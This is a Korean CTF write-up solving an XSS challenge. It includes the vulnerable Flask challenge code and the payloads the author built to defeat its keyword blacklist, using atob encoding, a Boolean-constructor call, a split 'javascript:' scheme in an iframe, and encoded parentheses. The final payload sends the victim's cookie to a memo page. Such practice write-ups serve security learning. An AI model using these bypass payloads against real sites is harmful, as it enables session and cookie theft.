이번 문제를 풀면서 많은 시행착오가 있었다.
먼저 아래의 문제 코드를 보자
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome("/chromedriver", options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript"]
for f in _filter:
if f in text.lower():
return "filtered!!!"
advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]
for f in advanced_filter:
if f in text.lower():
return "filtered!!!"
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
주목해야할 부분은 아래의 함수이다
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript"]
for f in _filter:
if f in text.lower():
return "filtered!!!"
advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]
for f in advanced_filter:
if f in text.lower():
return "filtered!!!"
return text더 많은 필터링들이 추가가 되었다.
처음부터 필터링을 하나 하나 걸러가며 무엇으로 공격하면 좋을지 짜고 시작하는게 좋았을 것 같다.
먼저 생각했던 것은 필터링 되는 것들을 피하기 위해 이전에 공부하면서 실습했던 atob을 사용하려고 했다.
그래서 먼저 아래 코드를 생각해냈다.
Boolean[constructor](location.href="/memo?memo="+document.cookie;)();Boolean객체의 생성자를 이용해 function Boolean(){native code}
이런 방식으로 코드를 실행하려고 했다.
그러기 위해서 필요는 없지만 constructor를 base64로 인코딩 해주고 그 뒤에 스크립트 또한 base64로 인코딩 해주었다
그리고 atob으로 실행되면서 디코딩까지 되게 해주었다.
그렇게 하면 아래와 같은 코드가 된다.
Boolean[atob('Y29uc3RydWN0b3I')](atob('bG9jYXRpb24uaHJlZj0iL21lbW8/bWVtbz0iK2RvY3VtZW50LmNvb2tpZTs='))();이렇게 안에 스크립트 코드를 우회했다면 그 다음으로는 태그 부분을 우회했어야했다.
나는 먼저 javascript 가 필터링 되는 것을 보고 태그부분은 iframe의 srcdoc 속성을 사용하여 html 엔티티를 이용해 우회하려고 했다.
그래서 짠 코드가 아래 코드이다.
<iframe srcdoc="<img src=1 onerror=Boolean[atob('Y29uc3RydWN0b3I')](atob('bG9jYXRpb24uaHJlZj0iL21lbW8/bWVtbz0iK2RvY3VtZW50LmNvb2tpZTs='))();">그렇게 FLAG를 얻을 줄 알고 입력해보았지만 memo에는 아무일도 없었다.
뭐가 문제인지 분석했는데 바로 아래처럼 &#가 필터링 되면서 html 엔티티가 필터링 되고 있었다는 것을 알게되었다.
advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]그래서 javascript 스키마를 사용하여 url 정규화를 이용해 우회해보려고 했다.
바로 아래처럼 말이다.
정규화라고 하면 url을 크롤링할 때 사용되는 것인데 다른 리소스를 가져오는 url을 정규화하여 같은 url로 만드는 작업이다.
그 과정에서 여러가지 특수문자나 인코딩된 문자들이 삭제된다.
처음에는 탭 부분을 /t로 했었지만 문자열로 인식한다는 것을 알게된 후 직접 공백을 입력했다.
그럼 저 공백이 필터에는 걸리지 않으면서 스키마 부분에 정규화가 이뤄지면서 저 공백이 삭제되고 javascript가 된다.
<iframe src="javascr iptBoolean[atob('Y29uc3RydWN0b3I')](atob('bG9jYXRpb24uaHJlZj0iL21lbW8/bWVtbz0iK2RvY3VtZW50LmNvb2tpZTs='))();">하지만 이 역시 되지 않았다.
대체 이유가 무엇일까 하다가 코드에서 괄호 조차도 필터링 되고 있다는 것을 알았다.
하지만 문제가 없었던 것은 이전에 공부할 때 javascript에서는 다양한 문자열을 위해 유니코드를 허용한다고 알고 있었기 때문이다.
그렇다면 괄호를 죄다 유니코드로 인코딩하여 넣으면 될 것이라고 생각했다.
(는 유니코드로 %28이고 )는 유니코드로 %29이다.
수정한 최종 코드는 아래와 같다.
혹여나 유니코드 중에 on이라고 되어있는 문자열이 없는지 확인 후
<iframe src="javascr ipt:Boolean[atob%28'Y29uc3RydWN0b3I'%29]%28atob%28'bG9jYXRpb24uaHJlZj0iL21lbW8/bWVtbz0iK2RvY3VtZW50LmNvb2tpZTs='%29%29%28%29;">아래처럼 코드를 vuln의 param으로 넣어줬다.
저 url을 클릭한 사용자의 그 후 과정은
필터링에 전혀 걸리지 않으면서 정규화를 거치고 그 안에 atob으로 코드들이 포장지를 뚫고 등장하게 된다.
또한 javascript 자체적으로 유니코드 인코딩 된 괄호를 디코딩하고
그러면서 memo페이지로 이동하라는 코드가 실행되고 그 안에 사용자의 쿠키를 적어버리게 된다.
그럼 아래와 같이 flag를 얻을 수 있게 된다.
어떤 필터링을 하더라도 해커들은 우회할 방법을 찾아내기에 화이트 리스트 기법으로 필터링 하는 것이 바람직하다.
